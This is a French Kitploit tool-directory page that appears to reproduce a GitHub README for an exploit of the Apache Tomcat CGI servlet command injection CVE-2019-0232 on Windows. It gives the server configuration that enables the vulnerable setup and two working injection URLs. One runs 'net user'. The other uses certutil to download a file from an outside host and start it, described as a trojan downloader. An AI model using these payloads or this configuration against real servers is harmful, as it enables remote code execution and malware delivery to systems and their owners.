Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-0232-EXP — Exploit for Apache Tomcat CGI Servlet command injection (CVE-2019-0232), permettant l'exécution de code à distance via des requêtes HTTP conçues sur les versions concernées. | Kitploit
Outils/GitHubGitHub/cyy95/cve-2019-0232-exp
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et Contrôle
GitHubcyy95/cve-2019-0232-exp

CVE-2019-0232-EXP

Exploit for Apache Tomcat CGI Servlet command injection (CVE-2019-0232), permettant l'exécution de code à distance via des requêtes HTTP conçues sur les versions concernées.

Voir le dépôt
33il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-0232-EXP

Environnement de test : Win10 Home 1809, version JRE 18.3 (build 10.0.2+13), version Tomcat 9.0.13.

Versions de Tomcat affectées

★Apache Tomcat 9.0.0.M1 à 9.0.17
★Apache Tomcat 8.5.0 à 8.5.39
★Apache Tomcat 7.0.0 à 7.0.93

Configuration de conf/web.xml

root@kitploit:~
<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi-bin</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <init-param>
      <param-name>executable</param-name>
      <param-value></param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>

Configuration des mappages de servlets :

root@kitploit:~
<servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>

Configuration de conf/context.xml

Ajouter l'attribut privileged="true"

root@kitploit:~
<Context privileged="true">
   <WatchedResource>WEB-INF/web.xml</WatchedResource>
   <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
   <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>

Enfin, créez un fichier vide hello.bat dans le dossier webapps/ROOT/WEB-INF, vous n'avez rien à écrire dedans. Démarrez Tomcat, ouvrez un navigateur et accédez au lien suivant : http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user

Test d'injection

Scénario d'exploitation de la vulnérabilité

Construisez un lien d'injection pour réaliser la fonction d'un téléchargeur d'image (cheval de Troie) : http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg

Téléchargeur d'image

Télécharger l’outil